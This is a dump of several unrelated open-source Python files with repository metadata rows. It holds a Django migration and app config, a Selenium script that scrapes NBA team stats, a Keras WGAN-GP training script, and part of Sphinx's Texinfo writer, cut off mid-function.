"Apache-2.0"
] | LottieWang/mindspore | tests/st/fl/mobile/test_mobile_lenet.py | 5,807 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-12 00:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=254, unique=True)),
('username', models.CharField(max_length=40, unique=True)),
('first_name', models.CharField(blank=True, max_length=40)),
('last_name', models.CharField(blank=True, max_length=40)),
('tagline', models.CharField(blank=True, max_length=140)),
('is_admin', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'abstract': False,
},
),
]
| 37.333333 | 114 | 0.584821 | [
"Apache-2.0"
] | shtanaka/dang | authentication/migrations/0001_initial.py | 1,344 | Python |
from django.apps import AppConfig
class CodecoverageConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'codecoverage'
| 22.285714 | 56 | 0.775641 | [
"Apache-2.0"
] | IsmatAl/thesisProject | backend/dynamicanalysis/codecoverage/apps.py | 156 | Python |
#! /usr/bin/env python3.6
from selenium import webdriver
import time
browser = webdriver.Chrome(executable_path='/home/coslate/anaconda3/bin/chromedriver')
#url = 'https://stats.nba.com/leaders'
url = 'http://stats.nba.com/teams/traditional/#!?sort=W_PCT&dir=-1'
browser.get(url)
time.sleep(5)
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/div[1]/div[1]/div/div/label/select/option[3]').click()
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/div[1]/div[2]/div/div/label/select/option[2]').click()
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/nba-stat-table/div[3]/div/div/select/option[1]').click()
#table = browser.find_element_by_class_name('nba-stat-table__overflow')
table = browser.find_elements_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/nba-stat-table/div[2]/div[1]/table/tbody')
line1 = browser.find_element_by_xpath('//tr[@index="0"]')
print(line1.text)
print("All the window handles : ")
print(browser.window_handles) # 查看所有window handles
print("The current window handle : ")
print(browser.current_window_handle) # 查看所有window handles
browser.close()
| 44.653846 | 130 | 0.750215 | [
"MIT"
] | Coslate/NBA_Win_Predictor | crawler/test_code/test_selenium.py | 1,177 | Python |
# Large amount of credit goes to:
# https://github.com/keras-team/keras-contrib/blob/master/examples/improved_wgan.py
# which I've used as a reference for this implementation
from __future__ import print_function, division
from keras.datasets import mnist
from keras.layers.merge import _Merge
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import RMSprop
from functools import partial
import keras.backend as K
import matplotlib.pyplot as plt
import sys
import numpy as np
class RandomWeightedAverage(_Merge):
"""Provides a (random) weighted average between real and generated image samples"""
def _merge_function(self, inputs):
alpha = K.random_uniform((32, 1, 1, 1))
return (alpha * inputs[0]) + ((1 - alpha) * inputs[1])
class WGANGP():
def __init__(self):
self.img_rows = 28
self.img_cols = 28
self.channels = 1
self.img_shape = (self.img_rows, self.img_cols, self.channels)
self.latent_dim = 100
# Following parameter and optimizer set as recommended in paper
self.n_critic = 5
optimizer = RMSprop(lr=0.00005)
# Build the generator and critic
self.generator = self.build_generator()
self.critic = self.build_critic()
#-------------------------------
# Construct Computational Graph
# for the Critic
#-------------------------------
# Freeze generator's layers while training critic
self.generator.trainable = False
# Image input (real sample)
real_img = Input(shape=self.img_shape)
# Noise input
z_disc = Input(shape=(self.latent_dim,))
# Generate image based of noise (fake sample)
fake_img = self.generator(z_disc)
# Discriminator determines validity of the real and fake images
fake = self.critic(fake_img)
valid = self.critic(real_img)
# Construct weighted average between real and fake images
interpolated_img = RandomWeightedAverage()([real_img, fake_img])
# Determine validity of weighted sample
validity_interpolated = self.critic(interpolated_img)
# Use Python partial to provide loss function with additional
# 'averaged_samples' argument
partial_gp_loss = partial(self.gradient_penalty_loss,
averaged_samples=interpolated_img)
partial_gp_loss.__name__ = 'gradient_penalty' # Keras requires function names
self.critic_model = Model(inputs=[real_img, z_disc],
outputs=[valid, fake, validity_interpolated])
self.critic_model.compile(loss=[self.wasserstein_loss,
self.wasserstein_loss,
partial_gp_loss],
optimizer=optimizer,
loss_weights=[1, 1, 10])
#-------------------------------
# Construct Computational Graph
# for Generator
#-------------------------------
# For the generator we freeze the critic's layers
self.critic.trainable = False
self.generator.trainable = True
# Sampled noise for input to generator
z_gen = Input(shape=(self.latent_dim,))
# Generate images based of noise
img = self.generator(z_gen)
# Discriminator determines validity
valid = self.critic(img)
# Defines generator model
self.generator_model = Model(z_gen, valid)
self.generator_model.compile(loss=self.wasserstein_loss, optimizer=optimizer)
def gradient_penalty_loss(self, y_true, y_pred, averaged_samples):
"""
Computes gradient penalty based on prediction and weighted real / fake samples
"""
gradients = K.gradients(y_pred, averaged_samples)[0]
# compute the euclidean norm by squaring ...
gradients_sqr = K.square(gradients)
# ... summing over the rows ...
gradients_sqr_sum = K.sum(gradients_sqr,
axis=np.arange(1, len(gradients_sqr.shape)))
# ... and sqrt
gradient_l2_norm = K.sqrt(gradients_sqr_sum)
# compute lambda * (1 - ||grad||)^2 still for each single sample
gradient_penalty = K.square(1 - gradient_l2_norm)
# return the mean as loss over all the batch samples
return K.mean(gradient_penalty)
def wasserstein_loss(self, y_true, y_pred):
return K.mean(y_true * y_pred)
def build_generator(self):
model = Sequential()
model.add(Dense(128 * 7 * 7, activation="relu", input_dim=self.latent_dim))
model.add(Reshape((7, 7, 128)))
model.add(UpSampling2D())
model.add(Conv2D(128, kernel_size=4, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(Activation("relu"))
model.add(UpSampling2D())
model.add(Conv2D(64, kernel_size=4, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(Activation("relu"))
model.add(Conv2D(self.channels, kernel_size=4, padding="same"))
model.add(Activation("tanh"))
model.summary()
noise = Input(shape=(self.latent_dim,))
img = model(noise)
return Model(noise, img)
def build_critic(self):
model = Sequential()
model.add(Conv2D(16, kernel_size=3, strides=2, input_shape=self.img_shape, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(32, kernel_size=3, strides=2, padding="same"))
model.add(ZeroPadding2D(padding=((0,1),(0,1))))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(64, kernel_size=3, strides=2, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(128, kernel_size=3, strides=1, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(1))
model.summary()
img = Input(shape=self.img_shape)
validity = model(img)
return Model(img, validity)
def train(self, epochs, batch_size, sample_interval=50):
# Load the dataset
(X_train, _), (_, _) = mnist.load_data()
# Rescale -1 to 1
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=3)
# Adversarial ground truths
valid = -np.ones((batch_size, 1))
fake = np.ones((batch_size, 1))
dummy = np.zeros((batch_size, 1)) # Dummy gt for gradient penalty
for epoch in range(epochs):
for _ in range(self.n_critic):
# ---------------------
# Train Discriminator
# ---------------------
# Select a random batch of images
idx = np.random.randint(0, X_train.shape[0], batch_size)
imgs = X_train[idx]
# Sample generator input
noise = np.random.normal(0, 1, (batch_size, self.latent_dim))
# Train the critic
d_loss = self.critic_model.train_on_batch([imgs, noise],
[valid, fake, dummy])
# ---------------------
# Train Generator
# ---------------------
g_loss = self.generator_model.train_on_batch(noise, valid)
# Plot the progress
print ("%d [D loss: %f] [G loss: %f]" % (epoch, d_loss[0], g_loss))
# If at save interval => save generated image samples
if epoch % sample_interval == 0:
self.sample_images(epoch)
def sample_images(self, epoch):
r, c = 5, 5
noise = np.random.normal(0, 1, (r * c, self.latent_dim))
gen_imgs = self.generator.predict(noise)
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')
axs[i,j].axis('off')
cnt += 1
fig.savefig("images/mnist_%d.png" % epoch)
plt.close()
if __name__ == '__main__':
wgan = WGANGP()
wgan.train(epochs=30000, batch_size=32, sample_interval=100)
| 36.414634 | 99 | 0.590534 | [
"MIT"
] | 311nguyenbaohuy/Keras-GAN | wgan_gp/wgan_gp.py | 8,958 | Python |
"""
sphinx.writers.texinfo
~~~~~~~~~~~~~~~~~~~~~~
Custom docutils writer for Texinfo.
:copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import textwrap
import warnings
from os import path
from typing import (TYPE_CHECKING, Any, Dict, Iterable, Iterator, List, Optional, Pattern, Set,
Tuple, Union, cast)
from docutils import nodes, writers
from docutils.nodes import Element, Node, Text
from sphinx import __display_version__, addnodes
from sphinx.deprecation import RemovedInSphinx50Warning
from sphinx.domains import IndexEntry
from sphinx.domains.index import IndexDomain
from sphinx.errors import ExtensionError
from sphinx.locale import _, __, admonitionlabels
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.i18n import format_date
from sphinx.writers.latex import collected_footnote
if TYPE_CHECKING:
from sphinx.builders.texinfo import TexinfoBuilder
logger = logging.getLogger(__name__)
COPYING = """\
@quotation
%(project)s %(release)s, %(date)s
%(author)s
Copyright @copyright{} %(copyright)s
@end quotation
"""
TEMPLATE = """\
\\input texinfo @c -*-texinfo-*-
@c %%**start of header
@setfilename %(filename)s
@documentencoding UTF-8
@ifinfo
@*Generated by Sphinx """ + __display_version__ + """.@*
@end ifinfo
@settitle %(title)s
@defindex ge
@paragraphindent %(paragraphindent)s
@exampleindent %(exampleindent)s
@finalout
%(direntry)s
@definfoenclose strong,`,'
@definfoenclose emph,`,'
@c %%**end of header
@copying
%(copying)s
@end copying
@titlepage
@title %(title)s
@insertcopying
@end titlepage
@contents
@c %%** start of user preamble
%(preamble)s
@c %%** end of user preamble
@ifnottex
@node Top
@top %(title)s
@insertcopying
@end ifnottex
@c %%**start of body
%(body)s
@c %%**end of body
@bye
"""
def find_subsections(section: Element) -> List[nodes.section]:
"""Return a list of subsections for the given ``section``."""
result = []
for child in section:
if isinstance(child, nodes.section):
result.append(child)
continue
elif isinstance(child, nodes.Element):
result.extend(find_subsections(child))
return result
def smart_capwords(s: str, sep: str = None) -> str:
"""Like string.capwords() but does not capitalize words that already
contain a capital letter."""
words = s.split(sep)
for i, word in enumerate(words):
if all(x.islower() for x in word):
words[i] = word.capitalize()
return (sep or ' ').join(words)
class TexinfoWriter(writers.Writer):
"""Texinfo writer for generating Texinfo documents."""
supported = ('texinfo', 'texi')
settings_spec: Tuple[str, Any, Tuple[Tuple[str, List[str], Dict[str, str]], ...]] = (
'Texinfo Specific Options', None, (
("Name of the Info file", ['--texinfo-filename'], {'default': ''}),
('Dir entry', ['--texinfo-dir-entry'], {'default': ''}),
('Description', ['--texinfo-dir-description'], {'default': ''}),
('Category', ['--texinfo-dir-category'], {'default':
'Miscellaneous'})))
settings_defaults: Dict = {}
output: str = None
visitor_attributes = ('output', 'fragment')
def __init__(self, builder: "TexinfoBuilder") -> None:
super().__init__()
self.builder = builder
def translate(self) -> None:
visitor = self.builder.create_translator(self.document, self.builder)
self.visitor = cast(TexinfoTranslator, visitor)
self.document.walkabout(visitor)
self.visitor.finish()
for attr in self.visitor_attributes:
setattr(self, attr, getattr(self.visitor, attr))
class TexinfoTranslator(SphinxTranslator):
builder: "TexinfoBuilder" = None
ignore_missing_images = False
default_elements = {
'author': '',
'body': '',
'copying': '',
'date': '',
'direntry': '',
'exampleindent': 4,
'filename': '',
'paragraphindent': 0,
'preamble': '',
'project': '',
'release': '',
'title': '',
}
def __init__(self, document: nodes.document, builder: "TexinfoBuilder") -> None:
super().__init__(document, builder)
self.init_settings()
self.written_ids: Set[str] = set() # node names and anchors in output
# node names and anchors that should be in output
self.referenced_ids: Set[str] = set()
self.indices: List[Tuple[str, str]] = [] # (node name, content)
self.short_ids: Dict[str, str] = {} # anchors --> short ids
self.node_names: Dict[str, str] = {} # node name --> node's name to display
self.node_menus: Dict[str, List[str]] = {} # node name --> node's menu entries
self.rellinks: Dict[str, List[str]] = {} # node name --> (next, previous, up)
self.collect_indices()
self.collect_node_names()
self.collect_node_menus()
self.collect_rellinks()
self.body: List[str] = []
self.context: List[str] = []
self.descs: List[addnodes.desc] = []
self.previous_section: nodes.section = None
self.section_level = 0
self.seen_title = False
self.next_section_ids: Set[str] = set()
self.escape_newlines = 0
self.escape_hyphens = 0
self.curfilestack: List[str] = []
self.footnotestack: List[Dict[str, List[Union[collected_footnote, bool]]]] = [] # NOQA
self.in_footnote = 0
self.in_samp = 0
self.handled_abbrs: Set[str] = set()
self.colwidths: List[int] = None
def finish(self) -> None:
if self.previous_section is None:
self.add_menu('Top')
for index in self.indices:
name, content = index
pointers = tuple([name] + self.rellinks[name])
self.body.append('\n@node %s,%s,%s,%s\n' % pointers)
self.body.append('@unnumbered %s\n\n%s\n' % (name, content))
while self.referenced_ids:
# handle xrefs with missing anchors
r = self.referenced_ids.pop()
if r not in self.written_ids:
self.body.append('@anchor{%s}@w{%s}\n' % (r, ' ' * 30))
self.ensure_eol()
self.fragment = ''.join(self.body)
self.elements['body'] = self.fragment
self.output = TEMPLATE % self.elements
# -- Helper routines
def init_settings(self) -> None:
elements = self.elements = self.default_elements.copy()
elements.update({
# if empty, the title is set to the first section title
'title': self.settings.title,
'author': self.settings.author,
# if empty, use basename of input file
'filename': self.settings.texinfo_filename,
'release': self.escape(self.config.release),
'project': self.escape(self.config.project),
'copyright': self.escape(self.config.copyright),
'date': self.escape(self.config.today or
format_date(self.config.today_fmt or _('%b %d, %Y'),
language=self.config.language))
})
# title
title: str = self.settings.title
if not title:
title_node = self.document.next_node(nodes.title)
title = title_node.astext() if title_node else '<untitled>'
elements['title'] = self.escape_id(title) or '<untitled>'
# filename
if not elements['filename']:
elements['filename'] = self.document.get('source') or 'untitled'
if elements['filename'][-4:] in ('.txt', '.rst'): # type: ignore
elements['filename'] = elements['filename'][:-4] # type: ignore
elements['filename'] += '.info' # type: ignore
# direntry
if self.settings.texinfo_dir_entry:
entry = self.format_menu_entry(
self.escape_menu(self.settings.texinfo_dir_entry),
'(%s)' % elements['filename'],
self.escape_arg(self.settings.texinfo_dir_description))
elements['direntry'] = ('@dircategory %s\n'
'@direntry\n'
'%s'
'@end direntry\n') % (
self.escape_id(self.settings.texinfo_dir_category), entry)
elements['copying'] = COPYING % elements
# allow the user to override them all
elements.update(self.settings.texinfo_elements)
def collect_node_names(self) -> None:
"""Generates a unique id for each section.
Assigns the attribute ``node_name`` to each section."""
def add_node_name(name: str) -> str:
node_id = self.escape_id(name)
nth, suffix = 1, ''
while node_id + suffix in self.written_ids or \
node_id + suffix in self.node_names:
nth += 1
suffix = '<%s>' % nth
node_id += suffix
self.written_ids.add(node_id)
self.node_names[node_id] = name
return node_id
# must have a "Top" node
self.document['node_name'] = 'Top'
add_node_name('Top')
add_node_name('top')
# each index is a node
self.indices = [(add_node_name(name), content)
for name, content in self.indices]
# each section is also a node
for section in self.document.findall(nodes.section):
title = cast(nodes.TextElement, section.next_node(nodes.Titular))
name = title.astext() if title else '<untitled>'
section['node_name'] = add_node_name(name)
def collect_node_menus(self) -> None:
"""Collect the menu entries for each "node" section."""
node_menus = self.node_menus
targets: List[Element] = [self.document]
targets.extend(self.document.findall(nodes.section))
for node in targets:
assert 'node_name' in node and node['node_name']
entries = [s['node_name'] for s in find_subsections(node)]
node_menus[node['node_name']] = entries
# try to find a suitable "Top" node
title = self.document.next_node(nodes.title)
top = title.parent if title else self.document
if not isinstance(top, (nodes.document, nodes.section)):
top = self.document
if top is not self.document:
entries = node_menus[top['node_name']]
entries += node_menus['Top'][1:]
node_menus['Top'] = entries
del node_menus[top['node_name']]
top['node_name'] = 'Top'
# handle the indices
for name, _content in self.indices:
node_menus[name] = []
node_menus['Top'].append(name)
def collect_rellinks(self) -> None:
"""Collect the relative links (next, previous, up) for each "node"."""
rellinks = self.rellinks
node_menus = self.node_menus
for id in node_menus:
rellinks[id] = ['', '', '']
# up's
for id, entries in node_menus.items():
for e in entries:
rellinks[e][2] = id
# next's and prev's
for id, entries in node_menus.items():
for i, id in enumerate(entries):
# First child's prev is empty
if i != 0:
rellinks[id][1] = entries[i - 1]
# Last child's next is empty
if i != len(entries) - 1:
rellinks[id][0] = entries[i + 1]
# top's next is its first child
try:
first = node_menus['Top'][0]
except IndexError:
pass
else:
rellinks['Top'][0] = first
rellinks[first][1] = 'Top'
# -- Escaping
# Which characters to escape depends on the context. In some cases,
# namely menus and node names, it's not possible to escape certain
# characters.
def escape(self, s: str) -> str:
"""Return a string with Texinfo command characters escaped."""
s = s.replace('@', '@@')
s = s.replace('{', '@{')
s = s.replace('}', '@}')
# prevent `` and '' quote conversion
s = s.replace('``', "`@w{`}")
s = s.replace("''", "'@w{'}")
return s
def escape_arg(self, s: str) -> str:
"""Return an escaped string suitable for use as an argument
to a Texinfo command."""
s = self.escape(s)
# commas are the argument delimiters
s = s.replace(',', '@comma{}')
# normalize white space
s = ' '.join(s.split()).strip()
return s
def escape_id(self, s: str) -> str:
"""Return an escaped string suitable for node names and anchors."""
bad_chars = ',:()'
for bc in bad_chars:
s = s.replace(bc, ' ')
if re.search('[^ .]', s):
# remove DOTs if name contains other characters
s = s.replace('.', ' ')
s = ' '.join(s.split()).strip()
return self.escape(s)
def escape_menu(self, s: str) -> str:
"""Return an escaped string suitable for menu entries."""
s = self.escape_arg(s)
s = s.replace(':', ';')
s = ' '.join(s.split()).strip()
return s
def ensure_eol(self) -> None:
"""Ensure the last line in body is terminated by new line."""
if self.body and self.body[-1][-1:] != '\n':
self.body.append('\n')
def format_menu_entry(self, name: str, node_name: str, desc: str) -> str:
if name == node_name:
s = '* %s:: ' % (name,)
else:
s = '* %s: %s. ' % (name, node_name)
offset = max((24, (len(name) + 4) % 78))
wdesc = '\n'.join(' ' * offset + l for l in
textwrap.wrap(desc, width=78 - offset))
return s + wdesc.strip() + '\n'
def add_menu_entries(self, entries: List[str], reg: Pattern = re.compile(r'\s+---?\s+')
) -> None:
for entry in entries:
name = self.node_names[entry]
# special formatting for entries that are divided by an em-dash
try:
parts = reg.split(name, 1)
except TypeError:
# could be a gettext proxy
parts = [name]
if len(parts) == 2:
name, desc = parts
else:
desc = ''
name = self.escape_menu(name)
desc = self.escape(desc)
self.body.append(self.format_menu_entry(name, entry, desc))
def add_menu(self, node_name: str) -> None:
entries = self.node_menus[node_name]
if not entries:
return
self.body.append('\n@menu\n')
self.add_menu_entries(entries)
if (node_name != 'Top' or
not self.node_menus[entries[0]] or
self.config.texinfo_no_detailmenu):
self.body.append('\n@end menu\n')
return
def _add_detailed_menu(name: str) -> None:
entries = self.node_menus[name]
if not entries:
return
self.body.append('\n%s\n\n' % (self.escape(self.node_names[name],)))
self.add_menu_entries(entries)
for subentry in entries:
_add_detailed_menu(subentry)
self.body.append('\n@detailmenu\n'
' --- The Detailed Node Listing ---\n')
for entry in entries:
_add_detailed_menu(entry)
self.body.append('\n@end detailmenu\n'
'@end menu\n')
def tex_image_length(self, width_str: str) -> str:
match = re.match(r'(\d*\.?\d*)\s*(\S*)', width_str)
if not match:
# fallback
return width_str
res = width_str
amount, unit = match.groups()[:2]
if not unit or unit == "px":
# pixels: let TeX alone
return ''
elif unit == "%":
# a4paper: textwidth=418.25368pt
res = "%d.0pt" % (float(amount) * 4.1825368)
return res
def collect_indices(self) -> None:
def generate(content: List[Tuple[str, List[IndexEntry]]], collapsed: bool) -> str:
ret = ['\n@menu\n']
for _letter, entries in content:
for entry in entries:
if not entry[3]:
continue
name = self.escape_menu(entry[0])
sid = self.get_short_id('%s:%s' % (entry[2], entry[3]))
desc = self.escape_arg(entry[6])
me = self.format_menu_entry(name, sid, desc)
ret.append(me)
ret.append('@end menu\n')
return ''.join(ret)
indices_config = self.config.texinfo_domain_indices
if indices_config:
for domain in self.builder.env.domains.values():
for indexcls in domain.indices:
indexname = '%s-%s' % (domain.name, indexcls.name)
if isinstance(indices_config, list):
if indexname not in indices_config:
continue
content, collapsed = indexcls(domain).generate(
self.builder.docnames)
if not content:
continue
self.indices.append((indexcls.localname,
generate(content, collapsed)))
# only add the main Index if it's not empty
domain = cast(IndexDomain, self.builder.env.get_domain('index'))
for docname in self.builder.docnames:
if domain.entries[docname]:
self.indices.append((_('Index'), '\n@printindex ge\n'))
break
# this is copied from the latex writer
# TODO: move this to sphinx.util
def collect_footnotes(self, node: Element) -> Dict[str, List[Union[collected_footnote, bool]]]: # NOQA
def footnotes_under(n: Element) -> Iterator[nodes.footnote]:
if isinstance(n, nodes.footnote):
yield n
else:
for c in n.children:
if isinstance(c, addnodes.start_of_file):
continue
elif isinstance(c, nodes.Element):
yield from footnotes_under(c)
fnotes: Dict[str, List[Union[collected_footnote, bool]]] = {}
for fn in footnotes_under(node):
label = cast(nodes.label, fn[0])
num = label.astext().strip()
fnotes[num] = [collected_footnote('', *fn.children), False]
return fnotes
# -- xref handling
def get_short_id(self, id: str) -> str:
"""Return a shorter 'id' associated with ``id``."""
# Shorter ids improve paragraph filling in places
# that the id is hidden by Emacs.
try:
sid = self.short_ids[id]
except KeyError:
sid = hex(len(self.short_ids))[2:]
self.short_ids[id] = sid
return sid
def add_anchor(self, id: str, node: Node) -> None:
if id.startswith('index-'):
return
id = self.curfilestack[-1] + ':' + id
eid = self.escape_id(id)
sid = self.get_short_id(id)
for id in (eid, sid):
if id not in self.written_ids:
self.body.append('@anchor{%s}' % id)
self.written_ids.add(id)
def add_xref(self, id: str, name: str, node: Node) -> None:
name = self.escape_menu(name)
sid = self.get_short_id(id)
if self.config.texinfo_cross_references:
self.body.append('@ref{%s,,%s}' % (sid, name))
self.referenced_ids.add(sid)
self.referenced_ids.add(self.escape_id(id))
else:
self.body.append(name)
# -- Visiting
def visit_document(self, node: Element) -> None:
self.footnotestack.append(self.collect_footnotes(node))
self.curfilestack.append(node.get('docname', ''))
if 'docname' in node:
self.add_anchor(':doc', node)
def depart_document(self, node: Element) -> None:
self.footnotestack.pop()
self.curfilestack.pop()
def visit_Text(self, node: Text) -> None:
s = self.escape(node.astext())
if self.escape_newlines:
s = s.replace('\n', ' ')
if self.escape_hyphens:
# prevent "--" and "---" conversion
s = s.replace('-', '@w{-}')
self.body.append(s)
def depart_Text(self, node: Text) -> None:
pass
def visit_section(self, node: Element) -> None:
self.next_section_ids.update(node.get('ids', []))
if not self.seen_title:
return
if self.previous_section:
self.add_menu(self.previous_section['node_name'])
else:
self.add_menu('Top')
node_name = node['node_name']
pointers = tuple([node_name] + self.rellinks[node_name])
self.body.append('\n@node %s,%s,%s,%s\n' % pointers)
for id in sorted(self.next_section_ids):
self.add_anchor(id, node)
self.next_section_ids.clear()
self.previous_section = cast(nodes.section, node)
self.section_level += 1
def depart_section(self, node: Element) -> None:
self.section_level -= 1
headings = (
'@unnumbered',
'@chapter',
'@section',
'@subsection',
'@subsubsection',
)
rubrics = (
'@heading',
'@subheading',
'@subsubheading',
)
def visit_title(self, node: Element) -> None:
if not self.seen_title:
self.seen_title = True
raise nodes.SkipNode
parent = node.parent
if isinstance(parent, nodes.table):
return
if isinstance(parent, (nodes.Admonition, nodes.sidebar, nodes.topic)):
raise nodes.SkipNode
elif not isinstance(parent, nodes.section):
logger.warning(__('encountered title node not in section, topic, table, '
'admonition or sidebar'),
location=node)
self.visit_rubric(node)
else:
try:
heading = self.headings[self.section_level]
except IndexError:
heading = self.headings[-1]
self.body.append('\n%s ' % heading)
def depart_title(self, node: Element) -> None:
self.body.append('\n\n')
def visit_rubric(self, node: Element) -> None:
if len(node) == 1 and node.astext() in ('Footnotes', _('Footnotes')):
raise nodes.SkipNode
try:
rubric = self.rubrics[self.section_level]
except IndexError:
rubric = self.rubrics[-1]
self.body.append('\n%s ' % rubric)
self.escape_newlines += 1
def depart_rubric(self, node: Element) -> None:
self.escape_newlines -= 1
self.body.append('\n\n')
def visit_subtitle(self, node: Element) -> None:
self.body.append('\n\n@noindent\n')
def depart_subtitle(self, node: Element) -> None:
self.body.append('\n\n')
# -- References
def visit_target(self, node: Element) -> None:
# postpone the labels until after the sectioning command
parindex = node.parent.index(node)
try:
try:
next = node.parent[parindex + 1]
except IndexError:
# last node in parent, look at next after parent
# (for section of equal level)
next = node.parent.parent[node.parent.parent.index(node.parent)]
if isinstance(next, nodes.section):
if node.get('refid'):
self.next_section_ids.add(node['refid'])
self.next_section_ids.update(node['ids'])
return
except (IndexError, AttributeError):
pass
if 'refuri' in node:
return
if node.get('refid'):
self.add_anchor(node['refid'], node)
for id in node['ids']:
self.add_anchor(id, node)
def depart_target(self, node: Element) -> None:
pass
def visit_reference(self, node: Element) -> None:
# an xref's target is displayed in Info so we ignore a few
# cases for the sake of appearance
if isinstance(node.parent, (nodes.title, addnodes.desc_type)):
return
if isinstance(node[0], nodes.image):
return
name = node.get('name', node.astext()).strip()
uri = node.get('refuri', '')
if not uri and node.get('refid'):
uri = '%' + self.curfilestack[-1] + '#' + node['refid']
if not uri:
return
if uri.startswith('mailto:'):
uri = self.escape_arg(uri[7:])
name = self.escape_arg(name)
if not name or name == uri:
self.body.append('@email{%s}' % uri)
else:
self.body.append('@email{%s,%s}' % (uri, name))
elif uri.startswith('#'):
# references to labels in the same document
id = self.curfilestack[-1] + ':' + uri[1:]
self.add_xref(id, name, node)
elif uri.startswith('%'):
# references to documents or labels inside documents
hashindex = uri.find('#')
if hashindex == -1:
# reference to the document
id = uri[1:] + '::doc'
else:
# reference to a label
id = uri[1:].replace('#', ':')
self.add_xref(id, name, node)
elif uri.startswith('info:'):
# references to an external Info file
uri = uri[5:].replace('_', ' ')
uri = self.escape_arg(uri)
id = 'Top'
if '#' in uri:
uri, id = uri.split('#', 1)
id = self.escape_id(id)
name = self.escape_menu(name)
if name == id:
self.body.append('@ref{%s,,,%s}' % (id, uri))
else:
self.body.append('@ref{%s,,%s,%s}' % (id, name, uri))
else:
uri = self.escape_arg(uri)
name = self.escape_arg(name)
show_urls = self.config.texinfo_show_urls
if self.in_footnote:
show_urls = 'inline'
if not name or uri == name:
self.body.append('@indicateurl{%s}' % uri)
elif show_urls == 'inline':
self.body.append('@uref{%s,%s}' % (uri, name))
elif show_urls == 'no':
self.body.append('@uref{%s,,%s}' % (uri, name))
else:
self.body.append('%s@footnote{%s}' % (name, uri))
raise nodes.SkipNode
def depart_reference(self, node: Element) -> None:
pass
def visit_number_reference(self, node: Element) -> None:
text = nodes.Text(node.get('title', '#'))
self.visit_Text(text)
raise nodes.SkipNode
def visit_title_reference(self, node: Element) -> None:
text = node.astext()
self.body.append('@cite{%s}' % self.escape_arg(text))
raise nodes.SkipNode
# -- Blocks
def visit_paragraph(self, node: Element) -> None:
self.body.append('\n')
def depart_paragraph(self, node: Element) -> None:
self.body.append('\n')
def visit_block_quote(self, node: Element) -> None:
self.body.append('\n@quotation\n')
def depart_block_quote(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end quotation\n')
def visit_literal_block(self, node: Element) -> None:
self.body.append('\n@example\n')
def depart_literal_block(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end example\n')
visit_doctest_block = visit_literal_block
depart_doctest_block = depart_literal_block
def visit_line_block(self, node: Element) -> None:
if not isinstance(node.parent, nodes.line_block):
self.body.append('\n\n')
self.body.append('@display\n')
def depart_line_block(self, node: Element) -> None:
self.body.append('@end display\n')
if not isinstance(node.parent, nodes.line_block):
self.body.append('\n\n')
def visit_line(self, node: Element) -> None:
self.escape_newlines += 1
def depart_line(self, node: Element) -> None:
self.body.append('@w{ }\n')
self.escape_newlines -= 1
# -- Inline
def visit_strong(self, node: Element) -> None:
self.body.append('@strong{')
def depart_strong(self, node: Element) -> None:
self.body.append('}')
def visit_emphasis(self, node: Element) -> None:
element = 'emph' if not self.in_samp else 'var'
self.body.append('@%s{' % element)
def depart_emphasis(self, node: Element) -> None:
self.body.append('}')
def is_samp(self, node: Element) -> bool:
return 'samp' in node['classes']
def visit_literal(self, node: Element) -> None:
if self.is_samp(node):
self.in_samp += 1
self.body.append('@code{')
def depart_literal(self, node: Element) -> None:
if self.is_samp(node):
self.in_samp -= 1
self.body.append('}')
def visit_superscript(self, node: Element) -> None:
self.body.append('@w{^')
def depart_superscript(self, node: Element) -> None:
self.body.append('}')
def visit_subscript(self, node: Element) -> None:
self.body.append('@w{[')
def depart_subscript(self, node: Element) -> None:
self.body.append(']}')
# -- Footnotes
def visit_footnote(self, node: Element) -> None:
raise nodes.SkipNode
def visit_collected_footnote(self, node: Element) -> None:
self.in_footnote += 1
self.body.append('@footnote{')
def depart_collected_footnote(self, node: Element) -> None:
self.body.append('}')
self.in_footnote -= 1
def visit_footnote_reference(self, node: Element) -> None:
num = node.astext().strip()
try:
footnode, used = self.footnotestack[-1][num]
except (KeyError, IndexError) as exc:
raise nodes.SkipNode from exc
# footnotes are repeated for each reference
footnode.walkabout(self) # type: ignore
raise nodes.SkipChildren
def visit_citation(self, node: Element) -> None:
